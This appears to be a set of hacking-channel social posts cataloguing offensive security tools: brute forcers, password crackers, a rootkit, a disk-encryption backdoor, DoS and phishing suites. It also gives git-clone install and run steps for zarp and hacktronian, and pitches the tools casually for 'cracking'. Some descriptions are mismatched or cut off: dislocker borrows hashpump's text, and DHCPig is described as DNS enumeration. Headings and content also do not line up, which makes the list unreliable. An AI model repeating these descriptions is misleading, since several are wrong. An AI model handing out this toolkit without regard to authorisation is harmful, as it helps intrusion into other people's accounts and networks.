delldrac 0.1a DellDRAC and Dell Chassis Discovery and Brute Forcer. https://www.trustedsec.com/september/owning-dell-drac-awesome-hack/
depant 0.3a Check network for services with default passwords. http://midnightresearch.com/projects/depant/
device-pharmer 35.c1d449e Opens 1K+ IPs or Shodan search results and attempts to login. https://github.com/DanMcInerney/device-pharmer
dex2jar 0.0.9.13 A tool for converting Android's .dex format to Java's .class format http://code.google.com/p/dex2jar
dff-scanner 1.1 Tool for finding path of predictable resource locations. http://netsec.rs/70/tools.html
dhcdrop 0.5 Remove illegal dhcp servers with IP-pool underflow. Stable version http://www.netpatch.ru/dhcdrop.html
dhcpig 69.cc4109a Enumerates hosts, subdomains, and emails from a given domain using google https://github.com/kamorin/DHCPig
dinouml 0.9.5 A network simulation tool, based on UML (User Mode Linux) that can simulate big Linux networks on a single PC http://kernel.embedromix.ro/us/
dirb 2.04 A web content scanner, brute forceing for hidden files http://dirb.sourceforge.net/
dirbuster 1.0_RC1 An application designed to brute force directories and files names on web/application servers http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
directorytraversalscan 1.0.1.0 Detect directory traversal vulnerabilities in HTTP servers and web applications. http://sourceforge.net/projects/httpdirscan/
dirs3arch 119.6a3b68a HTTP(S) directory/file brute forcer. https://github.com/maurosoria/dirs3arch
dirscanner 0.1 This is a python script that scans webservers looking for administrative directories, php shells, and more. http://packetstormsecurity.com/files/117773/Directory-Scanner-Tool.html
dislocker 0.3 A tool to exploit the hash length extension attack in various

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 7 :
pinterest.com/UndercOdeOfficial

dissector 1 This code dissects the internal data structures in ELF files. It supports x86 and x86_64 archs and runs under Linux. http://packetstormsecurity.com/files/125972/Coloured-ELF-File-Dissector.html
dizzy 0.8.2 A Python based fuzzing framework with many features. http://www.c0decafe.de/
dmitry 1.3a Deepmagic Information Gathering Tool. Gathers information about hosts. It is able to gather possible subdomains, email addresses, and uptime information and run tcp port scans, whois lookups, and more. http://www.mor-pah.net/
dnmap 0.6 The distributed nmap framework http://sourceforge.net/projects/dnmap/
dns-spoof 12.3918a10 Yet another DNS spoof utility. https://github.com/maurotfilho/dns-spoof
dns2geoip 0.1 A simple python script that brute forces DNS and subsequently geolocates the found subdomains. http://packetstormsecurity.com/files/118036/DNS-GeoIP.html
dns2tcp 0.5.2 A tool for relaying TCP connections over DNS. http://www.hsc.fr/ressources/outils/dns2tcp/index.html.en
dnsa 0.5 DNSA is a dns security swiss army knife http://packetfactory.openwall.net/projects/dnsa/index.html
dnsbf 0.2 search for available domain names in an IP range http://code.google.com/p/dnsbf
dnsbrute 2.b1dc84a Multi-theaded DNS bruteforcing, average speed 80 lookups/second with 40 threads. https://github.com/d4rkcat/dnsbrute
dnschef 0.3 A highly configurable DNS proxy for pentesters. http://thesprawl.org/projects/dnschef/
dnsdrdos 0.1 Proof of concept code for distributed DNS reflection DoS http://nullsecurity.net/tools/dos.html
dnsenum 1.2.4.1 Script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results. http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=dnsenum
dnsgoblin 0.1 Nasty creature constantly searching for DNS servers. It uses standard dns querys and waits for the replies http://nullsecurity.net/tools/scanner.html
DNStable Passive DNS network mapper https://dnstable.com/
dnspredict 0.0.2 DNS prediction http://johnny.ihackstuff.com
dnsrecon 0.8.8 Python script for enumeration of hosts, subdomains and emails from a given domain using google. https://github.com/darkoperator/dnsrecon
dnsspider 0.5 A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation. http://nullsecurity.net/tools/scanner.html
dnstracer 1.9 Determines where a given DNS server gets its information from, and follows the chain of DNS servers http://www.mavetju.org/unix/dnstracer.php
dnsutils 9.9.2.P2 DNS utilities: dig host nslookup http://www.isc.org/software/bind/
dnswalk 2.0.2 A DNS debugger http://sourceforge.net/projects/dnswalk/
domain-analyzer 0.8.1 Finds all the security information for a given domain name. http://sourceforge.net/projects/domainanalyzer/
doona 118.ff1e17b A fork of the Bruteforce Exploit Detector Tool (BED). https://github.com/wireghoul/doona
dotdotpwn 3.0 The Transversal Directory Fuzzer http://dotdotpwn.blogspot.com
dpeparser beta002 Default password enumeration project http://www.toolswatch.org/dpe/
dpscan 0.1 Drupal Vulnerabilty Scanner. https://github.com/insaneisnotfree/Blue-Sky-Information-Security
dradis 2.9.0 An open source framework to enable effective information sharing. http://dradisframework.org/
driftnet 0.1.6 Listens to network traffic and picks out images from TCP streams it observes. http://www.ex-parrot.com/~chris/driftnet/
_dripper v1.r1.gc9bb0c9 A fast, asynchronous DNS scanner; it can be used for enumerating subdomains and enumerating boxes via reverse DNS. http://www.blackhatlibrary.net/Dripper
dscanner 709.f00026f Swiss-army knife for D source code. https://github.com/Hackerpilot/Dscanner
dsd 84.60807e0 Digital Speech Decoder https://github.com/szechyjs/dsd

dumb0 19.1493e74 A simple tool to dump users in popular forums and CMS. https://github.com/0verl0ad/Dumb0

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 8:
pinterest.com/UndercOdeOfficial

dump1090 386.bff92c4 A simple Mode S decoder for RTLSDR devices. https://github.com/MalcolmRobb/dump1090
dumpacl 0.0 Dumps NTs ACLs and audit settings. http://www.systemtools.com/cgi-bin/download.pl?DumpAcl
dumpzilla 03152013 A forensic tool for firefox. http://www.dumpzilla.org/
eapmd5pass 1.4 An implementation of an offline dictionary attack against the EAP-MD5 protocol http://www.willhackforsushi.com/?page_id=67
easy-creds 3.9 A bash script that leverages ettercap and other tools to obtain credentials. https://github.com/brav0hax/easy-creds
easyfuzzer 3.6 A flexible fuzzer, not only for web, has a CSV output for efficient output analysis (platform independant). http://www.mh-sec.de/downloads.html.en
eazy 0.1 This is a small python tool that scans websites to look for PHP shells, backups, admin panels, and more. http://packetstormsecurity.com/files/117572/EAZY-Web-Scanner.html
edb 0.9.20 A QT4-based binary mode debugger with the goal of having usability on par with OllyDbg. http://www.codef00.com/projects.php#Debugger
eindeutig 20050628_1 Examine the contents of Outlook Express DBX email repository files (forensic purposes) http://www.jonesdykstra.com/
elettra 1.0 Encryption utility by Julia Identity http://www.winstonsmith.info/julia/elettra/
elettra-gui 1.0 Gui for the elettra crypto application. http://www.winstonsmith.info/julia/elettra/
elite-proxy-finder 42.b92f75a Finds public elite anonymity proxies and concurrently tests them. https://github.com/DanMcInerney/elite-proxy-finder
enabler 1 attempts to find the enable password on a cisco system via brute force. http://packetstormsecurity.org/cisco/enabler.c
encodeshellcode 0.1b This is an encoding tool for 32-bit x86 shellcode that assists a researcher when dealing with character filter or byte restrictions in a buffer overflow vulnerability or some kind of IDS/IPS/AV blocking your code. http://packetstormsecurity.com/files/119904/Encode-Shellcode.1b.html
ent 1.0 Pseudorandom number sequence test. http://www.fourmilab.ch/random
enum-shares 7.97cba5a Tool that enumerates shared folders across the network and under a custom user account. https://github.com/dejanlevaja/enum_shares
enum4linux 0.8.9 A tool for enumerating information from Windows and Samba systems. http://labs.portcullis.co.uk/application/enum4linux/
enumiax 1.0 IAX enumerator http://sourceforge.net/projects/enumiax/
enyelkm 1.2 Rootkit for Linux x86 kernels v2.6. http://www.enye-sec.org/programas.html
epicwebhoneypot 2.0a Tool which aims to lure attackers using various types of web vulnerability scanners by tricking them into believing that they have found a vulnerability on a host. http://sourceforge.net/projects/epicwebhoneypot/
erase-registrations 1.0 IAX flooder http://www.hackingexposedvoip.com/
etherape 0.9.13 A graphical network monitor for various OSI layers and protocols http://etherape.sourceforge.net/
ettercap 0.8.1 A network sniffer/interceptor/logger for ethernet LANs - console http://ettercap.github.com/ettercap/
evilgrade 2.0.0 Modular framework that takes advantage of poor upgrade implementations by injecting fake updates http://www.infobyte.com.ar/developments.html
evilmaid 1.01 TrueCrypt loader backdoor to sniff volume password http://theinvisiblethings.blogspot.com
exiv2 0.24 Exif and Iptc metadata manipulation library and tools http://exiv2.org
exploit-db 1.6 The Exploit Database (EDB) โ€“ an ultimate archive of exploits and vulnerable software - A collection of hacks http://www.exploit-db.com
extracthosts 14.ec8b89c Extracts hosts (IP/Hostnames) from files. https://github.com/bwall/ExtractHosts

eyewitness 278.e72c21e Designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 9 :
pinterest.com/UndercOdeOfficial

facebot 23.57f6025 A facebook profile and reconnaissance system. https://github.com/pun1sh3r/facebot
facebrute 7.ece355b This script tries to guess passwords for a given facebook account using a list of passwords (dictionary). https://github.com/emerinohdz/FaceBrute
fakeap 0.3.2 Black Alchemy's Fake AP generates thousands of counterfeit 802.11b access points. Hide in plain sight amongst Fake AP's cacophony of beacon frames. http://www.blackalchemy.to/project/fakeap/
fakedns 17.87d4216 A regular-expression based python MITM DNS server with correct DNS request passthrough and "Not Found" responses. https://github.com/Crypt0s/FakeDns
fakemail 1.0 Fake mail server that captures e-mails as files for acceptance testing. http://sourceforge.net/projects/fakemail/
fakenetbios 7.b83701e A family of tools designed to simulate Windows hosts (NetBIOS) on a LAN. https://github.com/mubix/FakeNetBIOS
fang 1.2 A multi service threaded MD5 cracker. https://github.com/evilsocket/fang
fcrackzip 1.0 Zip file password cracker http://oldhome.schmorp.de/marc/fcrackzip.html
fern-wifi-cracker 219 WEP, WPA wifi cracker for wireless penetration testing http://code.google.com/p/fern-wifi-cracker/
fernmelder 6.c6d4ebe Asynchronous mass DNS scanner. https://github.com/stealth/fernmelder
fgscanner 11.893372c An advanced, opensource URL scanner. http://www.fantaghost.com/fgscanner
fhttp 1.3 This is a framework for HTTP related attacks. It is written in Perl with a GTK interface, has a proxy for debugging and manipulation, proxy chaining, evasion rules, and more. http://packetstormsecurity.com/files/104315/FHTTP-Attack-Tool.3.html
fierce 0.9.9 A DNS scanner http://ha.ckers.org/fierce/
fiked 0.0.5 Fake IDE daemon http://www.roe.ch/FakeIKEd
filibuster 161.37b7f9c A Egress filter mapping application with additional functionality. https://github.com/subinacls/Filibuster
fimap 1.00 A little tool for local and remote file inclusion auditing and exploitation http://code.google.com/p/fimap/
findmyhash 1.1.2 Crack different types of hashes using free online services http://code.google.com/p/findmyhash/
firewalk 5.0 An active reconnaissance network security tool http://packetfactory.openwall.net/projects/firewalk/
firmware-mod-kit 099 Modify firmware images without recompiling! http://code.google.com/p/firmware-mod-kit
firstexecution 6.a275793 A Collection of different ways to execute code outside of the expected entry points. https://github.com/nccgroup/firstexecution
fl0p 0.1 A passive L7 flow fingerprinter that examines TCP/UDP/ICMP packet sequences, can peek into cryptographic tunnels, can tell human beings and robots apart, and performs a couple of other infosec-related tricks. http://lcamtuf.coredump.cx/
flare 0.6 Flare processes an SWF and extracts all scripts from it. http://www.nowrap.de/flare.html
flasm 1.62 Disassembler tool for SWF bytecode http://www.nowrap.de/flasm.html
flawfinder 1.31 Searches through source code for potential security flaws. http://www.dwheeler.com/flawfinder
flowinspect 94.01c8921 A network traffic inspection tool. https://github.com/7h3rAm/flowinspect
flunym0us 2.0 A Vulnerability Scanner for Wordpress and Moodle. http://code.google.com/p/flunym0us/
foremost 1.5.7 A console program to recover files based on their headers, footers, and internal data structures http://foremost.sourceforge.net/
fpdns 0.9.3 Program that remotely determines DNS server versions http://code.google.com/p/fpdns/
fping 3.10 A utility to ping multiple hosts at once http://www.fping.org/
fport 2.0 Identify unknown open ports and their associated applications. http://www.foundstone.com/us/resources/proddesc/fport.htm
fraud-bridge 10.775c563 ICMP and DNS tunneling via IPv4 and IPv6. https://github.com/stealth/fraud-bridge
freeipmi 1.4.5 Sensor monitoring, system event monitoring, power control, and serial-over-LAN (SOL). http://www.gnu.org/software/freeipmi/


@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 10 :
pinterest.com/UndercOdeOfficial

fs-nyarl 1.0 A network takeover & forensic analysis tool - useful to advanced PenTest tasks & for fun and profit. http://www.fulgursecurity.com/en/content/fs-nyarl
fsnoop 3.3 A tool to monitor file operations on GNU/Linux systems by using the Inotify mechanism. Its primary purpose is to help detecting file race condition vulnerabilities and since version 3, to exploit them with loadable DSO modules (also called "payload modules" or "paymods"). http://vladz.devzero.fr/fsnoop.php
fstealer 0.1 Automates file system mirroring through remote file disclosur vulnerabilities on Linux machines. http://packetstormsecurity.com/files/106450/FStealer-Filesystem-Mirroring-Tool.html
ftester 1.0 A tool designed for testing firewall filtering policies and Intrusion Detection System (IDS) capabilities. http://www.inversepath.com/ftester.html
ftp-fuzz 1337 The master of all master fuzzing scripts specifically targeted towards FTP server sofware http://nullsecurity.net/tools/fuzzer.html
ftp-scanner 0.2.5 Multithreaded ftp scanner/brute forcer. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/
ftp-spider 1.0 FTP investigation tool - Scans ftp server for the following: reveal entire directory tree structures, detect anonymous access, detect directories with write permissions, find user specified data within repository. http://packetstormsecurity.com/files/35120/ftp-spider.pl.html
fusil 1.4 Fusil the fuzzer is a Python library used to write fuzzing programs. It helps to start process with a prepared environment (limit memory, environment variables, redirect stdout, etc.), start network client or server, and create mangled files http://bitbucket.org/haypo/fusil/wiki/Home
fuzzap 14.f13932c A python script for obfuscating wireless networks. https://github.com/lostincynicism/FuzzAP
fuzzball2 0.7 A little fuzzer for TCP and IP options. It sends a bunch of more or less bogus packets to the host of your choice. http://nologin.org/
fuzzdb 1.09 Attack and Discovery Pattern Database for Application Fuzz Testing https://code.google.com/p/fuzzdb/
fuzzdiff 1.0 A simple tool designed to help out with crash analysis during fuzz testing. It selectively 'un-fuzzes' portions of a fuzzed file that is known to cause a crash, re-launches the targeted application, and sees if it still crashes. http://vsecurity.com/resources/tool
fuzztalk 1.0.0.0 An XML driven fuzz testing framework that emphasizes easy extensibility and reusability. https://code.google.com/p/fuzztalk
g72x++ 1 Decoder for the g72x++ codec. http://www.ps-auxw.de/
galleta 20040505_1 Examine the contents of the IE's cookie files for forensic purposes http://www.jonesdykstra.com/
gdb 7.8.1 The GNU Debugger http://www.gnu.org/software/gdb/
genlist 0.1 Generates lists of IP addresses.
geoedge 0.2 This little tools is designed to get geolocalization information of a host, it get the information from two sources (maxmind and geoiptool).
geoip 1.6.2 Non-DNS IP-to-country resolver C library & utils http://www.maxmind.com/app/c
geoipgen 0.4 GeoIPgen is a country to IP addresses generator. http://code.google.com/p/geoipgen/
getsids 0.0.1 Getsids tries to enumerate Oracle Sids by sending the services command to the Oracle TNS listener. Like doing โ€˜lsnrctl serviceโ€™. http://www.cqure.net/wp/getsids/
gggooglescan 0.4 A Google scraper which performs automated searches and returns results of search queries in the form of URLs or hostnames. http://www.morningstarsecurity.com/research/gggooglescan
ghettotooth 1.0 Ghettodriving for bluetooth http://www.oldskoolphreak.com/tfiles/ghettotooth.txt
ghost-phisher 1.62 GUI suite for phishing and penetration attacks http://code.google.com/p/ghost-phisher
ghost-py 0.1b3 Webkit based webclient (relies on PyQT). http://jeanphix.github.com/Ghost.py/


@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 11 :
pinterest.com/UndercOdeOfficial

gnutls2 2.12.23 A library which provides a secure layer over a reliable transport layer (Version 2) http://gnutls.org/
goldeneye 16.7a38fe9 A HTTP DoS test tool. Attack Vector exploited: HTTP Keep Alive + NoCache. https://github.com/jseidl/GoldenEye
golismero 2.0 Opensource web security testing framework. https://github.com/golismero/golismero
goodork 2.2 A python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. http://goo-dork.blogspot.com/
goofile 1.5 Command line filetype search https://code.google.com/p/goofile/
goog-mail 1.0 Enumerate domain emails from google. http://www.darkc0de.com/others/goog-mail.py
googlesub 1.2 A python script to find domains by using google dorks. https://github.com/zombiesam/googlesub
gqrx 2.3.1 Interactive SDR receiver waterfall for many devices. http://gqrx.dk/
grabber 0.1 A web application scanner. Basically it detects some kind of vulnerabilities in your website. http://rgaucher.info/beta/grabber/
grepforrfi 0.1 Simple script for parsing web logs for RFIs and Webshells v1.2 http://www.irongeek.com/downloads/grepforrfi.txt
grokevt 0.5.0 A collection of scripts built for reading Windowsยฎ NT/2K/XP/2K eventlog files. http://code.google.com/p/grokevt/
gtalk-decode 0.1 Google Talk decoder tool that demonstrates recovering passwords from accounts. http://packetstormsecurity.com/files/119154/Google-Talk-Decoder.html
gtp-scan 0.7 A small python script that scans for GTP (GPRS tunneling protocol) speaking hosts. http://www.c0decafe.de/
guymager 0.7.4 A forensic imager for media acquisition. http://guymager.sourceforge.net/
gwcheck 0.1 A simple program that checks if a host in an ethernet network is a gateway to Internet. http://packetstormsecurity.com/files/62047/gwcheck.c.html
gwtenum 7.f27a5aa Enumeration of GWT-RCP method calls. http://www.gdssecurity.com/l/t/d.php?k=GwtEnum
hackersh 0.2.0 A shell for with Pythonect-like syntax, including wrappers for commonly used security tools http://www.hackersh.org/
halberd 0.2.4 Halberd discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing. http://halberd.superadditive.com/
halcyon 0.1 A repository crawler that runs checksums for static files found within a given git repository. http://www.blackhatlibrary.net/Halcyon
hamster 2.0.0 Tool for HTTP session sidejacking. http://hamster.erratasec.com/
handle 0.0 An small application designed to analyze your system searching for global objects related to running proccess and display information for every found object, like tokens, semaphores, ports, files,.. http://www.tarasco.org/security/handle/index.html
hash-identifier 1.1 Identifies the different types of hashes used to encrypt data, especially passwords http://code.google.com/p/hash-identifier
hashcat 0.47 A multithreaded cross platform hash cracker. http://hashcat.net/hashcat/
_hashcat-utils 1.0 Utilites for Hashcat http://hashcat.net/wiki/doku.php?id=hashcat_utils
hasher 32.e9d1394 A tool that allows you to quickly hash plaintext strings, or compare hashed values with a plaintext locally. https://github.com/ChrisTruncer/Hasher
hashid 2.6.0 Software to identify the different types of hashes used to encrypt data https://github.com/psypanda/hashID
hashpump 34.0b3c286 A tool to exploit the hash length extension attack in various hashing algorithms. https://github.com/bwall/HashPump
hashtag 0.41 A python script written to parse and identify password hashes. https://github.com/SmeegeSec/HashTag
haystack 1035.ac2ffa4 A Python framework for finding C structures from process memory - heap analysis - Memory structures forensics. https://github.com/trolldbois/python-haystack
hbad 1.0 This tool allows you to test clients on the heartbleed bug. http://www.curesec.com/
hcraft 1.0.0 HTTP Vuln Request Crafter http://sourceforge.net/projects/hcraft/

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 11 :
t.me/UndercOdeTesting

hdmi-sniff 5.f7fbc0e HDMI DDC (I2C) inspection tool. It is designed to demonstrate just how easy it is to recover HDCP
crypto keys from HDMI devices. https://github.com/ApertureLabsLtd/hdmi-sniff

heartbleed-honeypot 0.1 Script that listens on TCP port 443 and responds with completely bogus SSL heartbeat responses, unless it detects the start of a byte pattern similar to that used in Jared Stafford's http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt
hex2bin 1.0.7 Converts Motorola and Intel hex files to binary. http://hex2bin.sourceforge.net/
hexinject 1.5 A very versatile packet injector and sniffer that provides a command-line framework for raw network access. http://hexinject.sourceforge.net
hexorbase 6 A database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). https://code.google.com/p/hexorbase/
hharp 1beta This tool can perform man-in-the-middle and switch flooding attacks. It has 4 major functions, 3 of which attempt to man-in-the-middle one or more computers on a network with a passive method or flood type method. http://packetstormsecurity.com/files/81368/Hackers-Hideaway-ARP-Attack-Tool.html
hidattack 0.1 HID Attack (attacking HID host implementations) http://mulliner.org/bluetooth/hidattack.php
honeyd 1.6.7 A small daemon that creates virtual hosts on a network. https://github.com/DataSoft/Honeyd/
honssh 47.0de60ec A high-interaction Honey Pot solution designed to log all SSH communications between a client and server. https://code.google.com/p/honssh/
hookanalyser 3.0 A hook tool which can be potentially helpful in reversing applications and analyzing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. http://hookanalyser.blogspot.de/
host-extract 9 Ruby script tries to extract all IP/Host patterns in page response of a given URL and JavaScript/CSS files of that URL. https://code.google.com/p/host-extract/
hostbox-ssh 0.1.1 A ssh password/account scanner. http://stridsmanit.wordpress.com/2012/12/02/brute-forcing-passwords-with-hostbox-ssh-1-1/

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Rooted termux-linux tool airmon-ng suite (for all your wireless cracking needs)
twitter.com/UndercOdeTC

๐Ÿฆ‘ Requirements

1) tcpdump

2) libmproxy (packaged with zarp)

3) paramiko (SSH service)

4) nfqueue-bindings (packet modifier)

๐Ÿฆ‘ The recommended installation process is to run:

1) git clone git://github.com/hatRiot/zarp.git

2) pip install -r requirements.txt

3) You can then run:

4) sudo python zarp.py --update
to update zarp. The update flag will not work if you download the tarball from the Git page.

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

> Scapy comes packaged with Zarp and no installation is required. Wifite is used for wireless AP cracking; a specific version (ballast-dev branch) is required.

> This comes packaged with zarp. There are some dependencies required for Scapy, but most should be pretty easy to install or already be installed.

๐Ÿฆ‘ Tool Overview
Broad categories are (see wiki for more information on these):

1) Poisoners

2) Denial of Service

3) Sniffers

4) Scanners

5) Services

6) Parameter

7) Attacks

๐Ÿฆ‘usage: zarp.py [-h] [-q FILTER] [--update] [--wap] [--ftp] [--http] [--smb]
[--ssh] [--telnet] [-w] [-s] [--service-scan]

optional arguments:
-h, --help show this help message and exit
-q FILTER Generic network sniff
--update Update Zarp

Services:
--wap Wireless access point
--ftp FTP server
--http HTTP Server
--smb SMB Service
--ssh SSH Server
--telnet Telnet server

Scanners:
-w Wireless AP Scan
-s Network scanner
--service-scan Service scanner
bryan@debdev:~/tools/zarp$

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Open Termux (you can download the application from google store)
>good pentesting package for termux
pinterest.com/UndercOdeOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) pkg install git

2) pkg install python

3) git clone https://github.com/thehackingsage/hacktronian.git

4) cd hacktronian

5) chmod +x hacktronian.py

6) python2 hacktronian.py

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–